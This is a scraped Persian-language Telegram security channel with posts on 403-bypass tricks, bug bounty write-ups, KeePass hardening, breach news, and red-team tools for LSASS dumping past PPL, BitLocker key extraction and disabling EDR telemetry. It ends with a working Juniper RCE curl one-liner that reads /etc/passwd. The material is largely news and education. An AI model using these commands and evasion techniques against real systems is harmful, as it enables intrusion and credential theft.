⭕️ چگونه هکرهای FBI یا تیم های فارنزیک تصاویر فیک را تشخیص میدهند؟
سازنده های تصاویر فیک معمولا اشتباهاتی میکنند که با استفاده از اونها میشه تصاویر جعلی و فیک رو تشخیص داد، برای مثال وقتی سازنده شیئ جدید رو به تصویر اضافه میکنه، فراموش میکنه که سایه اون رو هم در تصویر جعل کنه.
در این مقاله 10 تکنیک معرفی میشه:
1. روی گوشه اجزای تصویر زوم کنید.
2. دنبال متون برعکس شده بگردید.
3. اشیا بدون سایه پیدا کنید.
4. اجزای بدون انعکاس پیدا کنید.
و ...
لینک مقاله:
🔗 https://infosecwriteups.com/how-fbi-hackers-or-forensics-team-identify-fake-images-5574109ba959
#OSINT
@securation
سازنده های تصاویر فیک معمولا اشتباهاتی میکنند که با استفاده از اونها میشه تصاویر جعلی و فیک رو تشخیص داد، برای مثال وقتی سازنده شیئ جدید رو به تصویر اضافه میکنه، فراموش میکنه که سایه اون رو هم در تصویر جعل کنه.
در این مقاله 10 تکنیک معرفی میشه:
1. روی گوشه اجزای تصویر زوم کنید.
2. دنبال متون برعکس شده بگردید.
3. اشیا بدون سایه پیدا کنید.
4. اجزای بدون انعکاس پیدا کنید.
و ...
لینک مقاله:
🔗 https://infosecwriteups.com/how-fbi-hackers-or-forensics-team-identify-fake-images-5574109ba959
#OSINT
@securation
🔥17👎7👍5❤1😁1
⭕️ Bypassing 403 endpoints using automated Trickest workflows
تکنیک های دور زدن مسیر های 403 در وب سرور و API ها:
1. فاز تو در تو
اگر به مسیری مثل log/ درخواست زدید و 403 گرفتید ادامه این مسیر رو به شکل /log/FUZZ/ میتونید فاز کنید
2. هدر های HTTP
بعضی از هدر های خاص HTTP مثل X-Forwarded-For میتونه در این زمینه کمکتون کنه
3. استفاده از کاراکتر های خاص
برای مثال اگر به info.php/ درخواست زدید و 403 گرفتید میتونید
مسیر */info.php/ رو هم تست کنید
4. تغییر HTTP Method
این موضوع که تحت عنوان verb tampering هم شناخته میشه بررسی کردن متد های مختلف HTTP نظیر GET POST PUT PATCH در مسیر ها و اندپوینت های مختلف هست.
5. تغییر extension فایل
برای مثال تغییر config.php/ به .config.php/ ( به نقطه آخرش توجه کنید)
6. تغییر ورژن پروتکل HTTP
شما می تونید نسخه های مختلف این پروتکل رو بررسی کنید مثلا HTTP/1.0 و HTTP/1.1 و ...
منبع
https://trickest.com/blog/bypass-403-endpoints-with-trickest/
#bypass403
@securation
تکنیک های دور زدن مسیر های 403 در وب سرور و API ها:
1. فاز تو در تو
اگر به مسیری مثل log/ درخواست زدید و 403 گرفتید ادامه این مسیر رو به شکل /log/FUZZ/ میتونید فاز کنید
2. هدر های HTTP
بعضی از هدر های خاص HTTP مثل X-Forwarded-For میتونه در این زمینه کمکتون کنه
3. استفاده از کاراکتر های خاص
برای مثال اگر به info.php/ درخواست زدید و 403 گرفتید میتونید
مسیر */info.php/ رو هم تست کنید
4. تغییر HTTP Method
این موضوع که تحت عنوان verb tampering هم شناخته میشه بررسی کردن متد های مختلف HTTP نظیر GET POST PUT PATCH در مسیر ها و اندپوینت های مختلف هست.
5. تغییر extension فایل
برای مثال تغییر config.php/ به .config.php/ ( به نقطه آخرش توجه کنید)
6. تغییر ورژن پروتکل HTTP
شما می تونید نسخه های مختلف این پروتکل رو بررسی کنید مثلا HTTP/1.0 و HTTP/1.1 و ...
منبع
https://trickest.com/blog/bypass-403-endpoints-with-trickest/
#bypass403
@securation
👍20👎7🔥2
⭕️ با هوش مصنوعی تمپلیت های nuclei بسازید!
با استفاده از این ابزار شما میتونید با وارد کردن یک توضیح متنی راجع به تمپلیت مورد نظرتون اون رو بسازید.
🔗 https://bit.ly/nuclei-ai-powered
#Nuclei #BugBounty
@securation
با استفاده از این ابزار شما میتونید با وارد کردن یک توضیح متنی راجع به تمپلیت مورد نظرتون اون رو بسازید.
🔗 https://bit.ly/nuclei-ai-powered
#Nuclei #BugBounty
@securation
👍16👎6❤3😁2🔥1
⭕️
#فکت
میگن رونالدو و نیمار و بنزما قراره بیان ایران بابت مسابقات آسیایی، براتون رفتم به استقبال همشون:)
@securation
#فکت
میگن رونالدو و نیمار و بنزما قراره بیان ایران بابت مسابقات آسیایی، براتون رفتم به استقبال همشون:)
@securation
😁50👎10❤1👍1🤩1
⭕️Attention all computer students, hackers, enthusiasts, and cybersecurity lovers!
We are thrilled to announce the upcoming UCTF (Urmia CTF), an exhilarating cybersecurity competition specifically designed for computer students.
Join us on September 2nd at 12:00 GMT for an unforgettable experience filled with mind-bending challenges, intense problem-solving, and friendly competition.
Here are some key details about UCTF:
- Date: 2 September 2023 till 4 September 2023
- Time: 12:00 GMT
- Registration: https://uctf.ir
We look forward to seeing you at UCTF. Get ready to hack, learn, and conquer!
UCTF Organizing Committee
@u_ctf
Got questions? Contact us on Telegram @uctf_support_bot
@securation
We are thrilled to announce the upcoming UCTF (Urmia CTF), an exhilarating cybersecurity competition specifically designed for computer students.
Join us on September 2nd at 12:00 GMT for an unforgettable experience filled with mind-bending challenges, intense problem-solving, and friendly competition.
Here are some key details about UCTF:
- Date: 2 September 2023 till 4 September 2023
- Time: 12:00 GMT
- Registration: https://uctf.ir
We look forward to seeing you at UCTF. Get ready to hack, learn, and conquer!
UCTF Organizing Committee
@u_ctf
Got questions? Contact us on Telegram @uctf_support_bot
@securation
👎10👍9❤1
⭕️ How did I get $3300 With Just FFUF!!
در این مقاله هکر توضیح میده که چطوری با استفاده از ابزار FFUF تونسته 3300 دلار بانتی دریافت کنه.
هکر فایلی رو اپلود کرده و وبسایت اون فایل رو با داشتن ID فایل به کاربر نشون میده. هکر تصمیم گرفته ایدی فایل رو عوض کنه و تصمیم گرفته از ابزار ffuf استفاده کنه و ID های مختلف رو تست کنه تا ببینه نتیجه ای میگیره یا نه.
نتیجه تست این شد که حدود 3 گیگابایت اطلاعات پاسپورت و مدارک کاربر های دیگ رو پیدا کرده و ریپورت داده.
لینک مقاله:
🔗 https://bit.ly/3300bucks-ffuf
#BugBounty
@securation
در این مقاله هکر توضیح میده که چطوری با استفاده از ابزار FFUF تونسته 3300 دلار بانتی دریافت کنه.
هکر فایلی رو اپلود کرده و وبسایت اون فایل رو با داشتن ID فایل به کاربر نشون میده. هکر تصمیم گرفته ایدی فایل رو عوض کنه و تصمیم گرفته از ابزار ffuf استفاده کنه و ID های مختلف رو تست کنه تا ببینه نتیجه ای میگیره یا نه.
نتیجه تست این شد که حدود 3 گیگابایت اطلاعات پاسپورت و مدارک کاربر های دیگ رو پیدا کرده و ریپورت داده.
لینک مقاله:
🔗 https://bit.ly/3300bucks-ffuf
#BugBounty
@securation
👍17👎4😁3🔥2❤1
⭕️برای ذخیره پسورد های حساب ها از برنامه های متفاوتی استفاده میشه بعضی بر روی کلود هستند و بعضی لوکال.
از ابزار هایی که به صورت لوکال نگهداری میکند ابزار Keepass هست که مدتی پیش آسیب پذیری هایی بر روی آن پیدا شد.در این پست یک سری نکاتی رو عنوان میکنم که ترجیحا رعایت کنیم بهتره.
در ابتدا توصیه ای که میشود فایل دیتابیس پسورد ها را در درایور bitlocker قرار بدید و بعد از باز کردن برنامه درایور را قفل کنید و به هیچ عنوان از قابلیت auto unlock که از TMP برای باز گشایی درایور رمز شده، استفاده نکنید ( چند هفته گذشته گزارشی مبنی بر شکستن Bitlocker در لپتاپ لنوو اتفاق افتاد که خب بعید نیست در سیستم های دیگر هم امکان این باشه بالاخره همیشه پای side-channel ها وسط هست).
مورد دوم سعی کنید از قابلیت کپی برنامه استفاده نکنید حتی با اینکه بعد از کپی از کلیپ بورد حذف میشود و تایپ کنید پسورد هاتون رو.
مورد سوم بعد از اتمام کار حتما برنامه را قفل و یا ببندید در پس زمینه باز نباشد.
مورد چهارم به ورژن 2.54 و یا جدید تر اپدیت کنید
پسورد master را تغییر دهید
crash dump رو در C:\Windows\memory.dmp از بین ببرید
فایل hibernation را از بین ببرید
pagefile/swapfile را از بین ببرید و البته فراموش نکنید که دوباره فعالش کنید
البته میتونید هارد را overwrite کنید و ویندوز جدید نصب کنید جای همه این کار ها.
https://github.com/vdohney/keepass-password-dumper
#keepass #hardening
@securation
از ابزار هایی که به صورت لوکال نگهداری میکند ابزار Keepass هست که مدتی پیش آسیب پذیری هایی بر روی آن پیدا شد.در این پست یک سری نکاتی رو عنوان میکنم که ترجیحا رعایت کنیم بهتره.
در ابتدا توصیه ای که میشود فایل دیتابیس پسورد ها را در درایور bitlocker قرار بدید و بعد از باز کردن برنامه درایور را قفل کنید و به هیچ عنوان از قابلیت auto unlock که از TMP برای باز گشایی درایور رمز شده، استفاده نکنید ( چند هفته گذشته گزارشی مبنی بر شکستن Bitlocker در لپتاپ لنوو اتفاق افتاد که خب بعید نیست در سیستم های دیگر هم امکان این باشه بالاخره همیشه پای side-channel ها وسط هست).
مورد دوم سعی کنید از قابلیت کپی برنامه استفاده نکنید حتی با اینکه بعد از کپی از کلیپ بورد حذف میشود و تایپ کنید پسورد هاتون رو.
مورد سوم بعد از اتمام کار حتما برنامه را قفل و یا ببندید در پس زمینه باز نباشد.
مورد چهارم به ورژن 2.54 و یا جدید تر اپدیت کنید
پسورد master را تغییر دهید
crash dump رو در C:\Windows\memory.dmp از بین ببرید
فایل hibernation را از بین ببرید
pagefile/swapfile را از بین ببرید و البته فراموش نکنید که دوباره فعالش کنید
البته میتونید هارد را overwrite کنید و ویندوز جدید نصب کنید جای همه این کار ها.
https://github.com/vdohney/keepass-password-dumper
#keepass #hardening
@securation
GitHub
GitHub - vdohney/keepass-password-dumper: Original PoC for CVE-2023-32784
Original PoC for CVE-2023-32784. Contribute to vdohney/keepass-password-dumper development by creating an account on GitHub.
👍9👎4❤1
⭕️ یک محقق امنیتی اومده با تکنیک های #osint روی گروه آشیانه و dark coders کار کرده و عکسهای شخصی و تیمی این گروه ها و دامنه ها و لیست ایمیل و ایدی هاشون و اسمهایی که باهاشون دیفیس میزدند و لیست اعضایی که توی روزنامه ها و خبرهای مختلف منتشر میشده و کلی مبحث دیگه رو تحلیل و بصورت عمومی منتشر کرده
یادش بخیر این گروه ها چقد باحالن عکسهاشون😁
https://ddanchev.blogspot.com/search?q=Ashiyane+&x=41&y=7
#osint
@securation
یادش بخیر این گروه ها چقد باحالن عکسهاشون😁
https://ddanchev.blogspot.com/search?q=Ashiyane+&x=41&y=7
#osint
@securation
Blogspot
Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
Independent Contractor. Bitcoin: 15Zvie1j8CjSR52doVSZSjctCDSx3pDjKZ Email: dancho.danchev@hush.com OMEMO: ddanchev@conversations.im | OTR: danchodanchev@xmpp.jp | TOX ID: 53B409440A6DC34F1BA458869A0462D92C15B467AF6319D481CA353690C88667833A0EE82969
😁22😢1
⭕️ متاسفانه دیتای #تپسی در دارک وب هم درحال فروش است.
https://twitter.com/FalconFeedsio/status/1698651954967097622?t=L2Dzg6DiOsIAxVQYdA77ew&s=19
@securation
https://twitter.com/FalconFeedsio/status/1698651954967097622?t=L2Dzg6DiOsIAxVQYdA77ew&s=19
@securation
😁18👎6😱6😢4👍3❤1🔥1
⭕️ در پست های گذشته اشاره ای به مکانیزم PPL و جلوگیری از استخراج LSASS و البته ابزار و تکنیک PPLBLADE کرده شد.،به شرح آن میپردازم.
در ابتدا باید بپرسیم که PPL چیست ؟ Protected Process Light مکانیزمی است که از ویندوز 8.1 به بعد به ویندوز اضافه شده و وظیفه آن اجرا شدن سرویس ها و پروسه های معتبر با signature های داخلی و خارجی معتبر است.
برای دور زدن آن ما با استفاده از درایور ابزار process explorer به نام PROCEXP152.sys
با استفاده از object، PROCESS_ALL_ACCESS میتوانیم PPL را دور بزنیم.
به طوری که با فراخوانی PROCEXP152.sys و استفاده از API هایی اعم از DeviceIoControl و MiniDumpWriteDump
و استفاده از مبهم سازی فایل خروجی گرفته شده با الگوریتم XOR و یا انتقال آن به محلی دیگر تحت RAW و SMB اقدام به انجام این کار میکنیم.
https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
https://github.com/tastypepperoni/PPLBlade
#RedTeam
@securation
در ابتدا باید بپرسیم که PPL چیست ؟ Protected Process Light مکانیزمی است که از ویندوز 8.1 به بعد به ویندوز اضافه شده و وظیفه آن اجرا شدن سرویس ها و پروسه های معتبر با signature های داخلی و خارجی معتبر است.
برای دور زدن آن ما با استفاده از درایور ابزار process explorer به نام PROCEXP152.sys
با استفاده از object، PROCESS_ALL_ACCESS میتوانیم PPL را دور بزنیم.
به طوری که با فراخوانی PROCEXP152.sys و استفاده از API هایی اعم از DeviceIoControl و MiniDumpWriteDump
و استفاده از مبهم سازی فایل خروجی گرفته شده با الگوریتم XOR و یا انتقال آن به محلی دیگر تحت RAW و SMB اقدام به انجام این کار میکنیم.
https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6
https://github.com/tastypepperoni/PPLBlade
#RedTeam
@securation
Medium
Bypassing Defender’s LSASS dump detection and PPL protection In Go
Overview
🔥6❤5👍3🤩1
این رشته توییت کوتاه رو درمورد فرهنگ باگ بانتی توی ایران نوشتم
https://twitter.com/1rpwn/status/1702219625298075948?t=uhzLIBPLTgsKhTIOykw28g&s=35
https://twitter.com/1rpwn/status/1702219625298075948?t=uhzLIBPLTgsKhTIOykw28g&s=35
X (formerly Twitter)
Adel on X
باگ بانتی اخلاقی ترین روش برای دریافت تلاش شما روی پلتفرمی هست که آسیب پذیری کشف کردی و بهت بانتی میده.
اگه شما باگ هانتر هستی و نیاز به پول داری بشین روی هزاران تارگت توی هکروان و پلتفرم های دیگه کار کن
چرا به ۱۲ میلیون بانتی تپسی تیکه میندازی؟
برای گدایی…
اگه شما باگ هانتر هستی و نیاز به پول داری بشین روی هزاران تارگت توی هکروان و پلتفرم های دیگه کار کن
چرا به ۱۲ میلیون بانتی تپسی تیکه میندازی؟
برای گدایی…
👍18👎8
⭕️ رسانه های اسراییلی خبر از اختلال در سیستم ریلی این کشور میدن ، استفاده از محصولات شرکت امنیتی Checkpoint و اکسپلویت های اون نقش مهمی در حملات سایبری هکرهای ایرانی به این سیستم شده است.
همچنین هکرهای ایرانی بیش از ۳۰ شرکت اسرائیلی را با استفاده از آسیب پذیری های Exchange مورد نفوذ قرار داده اند.
شرکت ESET اعلام کرد که هکرهای ایرانی با سوء استفاده از آسیب پذیریهای شناخته شده در Microsoft Exchange نسبت به نصب Backdoorهایی در سرورهای هدف اقدام کرده اند که به آنها اجازه ورود به شبکهها را میدهد.
شرکتهای هدف قرارگرفته شامل شرکتهای بیمه، پزشکی، صنعتی، ارتباطات، فناوری اطلاعات، فناوری، خودروسازی ، حقوقی، خدمات مالی، معماری و مهندسی عمران هستند.
https://www.ynetnews.com/business/article/rjrs5pn02
https://news.walla.co.il/break/3373519
#Israel #war #checkpoint
همچنین هکرهای ایرانی بیش از ۳۰ شرکت اسرائیلی را با استفاده از آسیب پذیری های Exchange مورد نفوذ قرار داده اند.
شرکت ESET اعلام کرد که هکرهای ایرانی با سوء استفاده از آسیب پذیریهای شناخته شده در Microsoft Exchange نسبت به نصب Backdoorهایی در سرورهای هدف اقدام کرده اند که به آنها اجازه ورود به شبکهها را میدهد.
شرکتهای هدف قرارگرفته شامل شرکتهای بیمه، پزشکی، صنعتی، ارتباطات، فناوری اطلاعات، فناوری، خودروسازی ، حقوقی، خدمات مالی، معماری و مهندسی عمران هستند.
https://www.ynetnews.com/business/article/rjrs5pn02
https://news.walla.co.il/break/3373519
#Israel #war #checkpoint
ynetnews
Iranian hackers break into networks of more than 30 companies in Israel
Cyber company ESET found that Iranian hackers took advantage of a known weakness in corporate email servers to introduce a backdoor that allows entry into their networks; The companies include insurance, medicine, industry, communications, IT, technology…
👍28😁10👎8🔥1
⭕️ بنظر میاد ثبت احوال هک شده و هکر به زیرساخت کل دسترسی کامل داشته!
تصویر فوق منتشر شده توسط هکرها میباشد که دسترسی کامل به سرویس های زیرساختی را نشان میدهد.
+ وبسایت ثبت احوال از دسترس خارج شده است.
@securation
تصویر فوق منتشر شده توسط هکرها میباشد که دسترسی کامل به سرویس های زیرساختی را نشان میدهد.
+ وبسایت ثبت احوال از دسترس خارج شده است.
@securation
😁77👎12👍7😱6❤2🔥2😢2🎉1
⭕️ابزار جالبی برای استخراج کلید بازیابی bitlocker اخیرا نوشته شده است.
این ابزار با استفاده از اتصال به LDAP لیست کامپیوتر هارا در دامین شناسایی کرده و اقدام به کشف و استخراج کلید بازیابی bitlocker میکند.
نکته مورد اهمیت این است که خروجی این ابزار در فایل های json,xslx,sqlite3 موارد زیر میباشد:
FQDN کامیپوتر ها
کلید بازیابی
GUID درایو مورد نظر
OU سازنده
در آخر باید در نظر داشت که پس از تولید کلید بازیابی آن را پرینت کرده و در گاوصندق به صورت فیزیکی نگهداری کنید:)
https://github.com/p0dalirius/ExtractBitlockerKeys
#RedTeam
@securation
این ابزار با استفاده از اتصال به LDAP لیست کامپیوتر هارا در دامین شناسایی کرده و اقدام به کشف و استخراج کلید بازیابی bitlocker میکند.
نکته مورد اهمیت این است که خروجی این ابزار در فایل های json,xslx,sqlite3 موارد زیر میباشد:
FQDN کامیپوتر ها
کلید بازیابی
GUID درایو مورد نظر
OU سازنده
در آخر باید در نظر داشت که پس از تولید کلید بازیابی آن را پرینت کرده و در گاوصندق به صورت فیزیکی نگهداری کنید:)
https://github.com/p0dalirius/ExtractBitlockerKeys
#RedTeam
@securation
GitHub
GitHub - p0dalirius/ExtractBitlockerKeys: A system administration or post-exploitation script to automatically extract the bitlocker…
A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain. - p0dalirius/ExtractBitlockerKeys
👍10❤1🔥1
⭕️ اگر به دور زدن AV و EDR ها علاقه مند هستید ابزاری بر روی کشف منابع telemetry آن ها وجود دارد که برای تمرین و البته تحلیل بسیار مفید خواهد بود.
از این ابزار میتوان برای موارد زیر استفاده کرد:
شناسایی نقاط کور در محصولات.
مشخص کننده اینکه کدام telemetry چه اقداماتی را انجام میدهد.
بررسی آنکه ایا با دستکاری منجر به شناسایی میشود یا خیر.
قابلیت شناسایی Kernel-Mode Callback ها و دستکاری آن ها دارد.
قابلیت شناسایی inline user-mode hooks و دسترسی به آن را دارد.
انواع ETW هارا شناسایی و قابلیت غیر فعال سازی آنها را دارد.
نکته OPPSEC: در آخر در نظر داشته باشید این ابزار برای محیط واقعی ساخته نشده و برای تمرین است. در صورت نیاز از کد در پروژه دیگری استفاده و اقدام به مبهم سازی و تکنیک های دیگر کنید تا رد پای کمتری بماند.
https://github.com/jthuraisamy/TelemetrySourcerer
#RedTeam
@securation
از این ابزار میتوان برای موارد زیر استفاده کرد:
شناسایی نقاط کور در محصولات.
مشخص کننده اینکه کدام telemetry چه اقداماتی را انجام میدهد.
بررسی آنکه ایا با دستکاری منجر به شناسایی میشود یا خیر.
قابلیت شناسایی Kernel-Mode Callback ها و دستکاری آن ها دارد.
قابلیت شناسایی inline user-mode hooks و دسترسی به آن را دارد.
انواع ETW هارا شناسایی و قابلیت غیر فعال سازی آنها را دارد.
نکته OPPSEC: در آخر در نظر داشته باشید این ابزار برای محیط واقعی ساخته نشده و برای تمرین است. در صورت نیاز از کد در پروژه دیگری استفاده و اقدام به مبهم سازی و تکنیک های دیگر کنید تا رد پای کمتری بماند.
https://github.com/jthuraisamy/TelemetrySourcerer
#RedTeam
@securation
GitHub
GitHub - jthuraisamy/TelemetrySourcerer: Enumerate and disable common sources of telemetry used by AV/EDR.
Enumerate and disable common sources of telemetry used by AV/EDR. - jthuraisamy/TelemetrySourcerer
❤6👍3
⭕️ Tricky 2FA Bypass Leads to 4 digit Bounty $$$$
همانطور که میدونید، 2fa همان احراز هویت دو عاملی هست، و برای این استفاده میشه که کاربران رو مجبور کنه قبل از دسترسی به حساب یا سیستم یا اپلیکشن دو فاکتور احراز هویت ارائه بدن.
هکر در این مقاله اول اقدام به ساخت یک حساب کرده و بعد احراز هویت دوعاملی یا 2fa رو فعال کرده و از اکانت خارج شده.
در مرحله بعد به صفحه ی "فراموشی رمز عبور" رفته و رمز عبور اکانت رو ریست کرده و تونسته بدون ارائه 2fa رمز اکانت رو تغییر بده و لاگین کنه.
این اسیب پذیری یک پیکربندی اشتباه سمت سرور هستش، وبسایت برای اینکه رمز اکانت رو تغییر بده باید درخواست 2fa میکرد که اینکارو انجام نداد و باعث این اسیب پذیری شد.
لینک مقاله:
🔗 https://bit.ly/2fa-bypass-sep-2023
#ATO #2FA
@securation
همانطور که میدونید، 2fa همان احراز هویت دو عاملی هست، و برای این استفاده میشه که کاربران رو مجبور کنه قبل از دسترسی به حساب یا سیستم یا اپلیکشن دو فاکتور احراز هویت ارائه بدن.
هکر در این مقاله اول اقدام به ساخت یک حساب کرده و بعد احراز هویت دوعاملی یا 2fa رو فعال کرده و از اکانت خارج شده.
در مرحله بعد به صفحه ی "فراموشی رمز عبور" رفته و رمز عبور اکانت رو ریست کرده و تونسته بدون ارائه 2fa رمز اکانت رو تغییر بده و لاگین کنه.
این اسیب پذیری یک پیکربندی اشتباه سمت سرور هستش، وبسایت برای اینکه رمز اکانت رو تغییر بده باید درخواست 2fa میکرد که اینکارو انجام نداد و باعث این اسیب پذیری شد.
لینک مقاله:
🔗 https://bit.ly/2fa-bypass-sep-2023
#ATO #2FA
@securation
👍9❤1
Forwarded from Yashar Mahmoudnia
_
🦅 تیم امنیت نرم افزار بایت امن | مرجع تخصصی در حوزه باینری
🏳️ برنامه نویسی | تحلیل بدافزار | توسعه آسیب پذیری | مهندسی معکوس | امنیت نرم افزار
🐞 به همراه گروه پرسش و پاسخ و منابع آموزشی
🌐 @SecureByte | Group
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤7👎5👍2
⭕️آسیب پذیری با شماره CVE-2023-29357 برای Microsoft SharePoint Server ثبت شده که اکسپلویت اون در گیت هاب در دسترس است.
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@securation
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@securation
GitHub
GitHub - Chocapikk/CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege Vulnerability
Microsoft SharePoint Server Elevation of Privilege Vulnerability - Chocapikk/CVE-2023-29357
🤩12👍3😱2🔥1
⭕️Juniper Web Device Manager - RCE
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@securation
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@securation
👍5👎1